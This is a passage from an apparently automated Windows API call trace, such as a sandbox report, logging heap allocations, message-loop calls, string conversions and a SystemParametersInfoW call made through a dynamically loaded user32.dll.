0x2a721d8 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0238.009] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0238.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0238.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0238.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0238.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0238.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0238.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0238.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0238.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0238.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0238.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0238.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0238.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0238.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0238.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0238.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0238.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0238.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0238.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0238.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0238.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0238.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0238.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0238.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0238.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0238.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0238.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0238.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0238.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0238.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0238.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0238.014] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0238.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0238.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0238.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0238.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7080 [0238.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7080, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0238.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0238.015] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0238.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0238.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0238.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0238.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0238.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0238.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0238.015] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0238.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865268 [0238.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0238.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0238.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0238.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0238.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0238.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0238.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0238.156] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0238.156] FreeLibrary (hLibModule=0x76240000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0238.156] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0238.157] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865490 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0238.157] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865268 | out: hHeap=0x2af0000) returned 1 [0238.157] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0238.157] TranslateMessage (lpMsg=0x8cf708) returned 0 [0238.157] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0238.158] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0238.158] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0238.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.158] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0238.158] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0238.158] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0238.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0238.159] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0238.159] 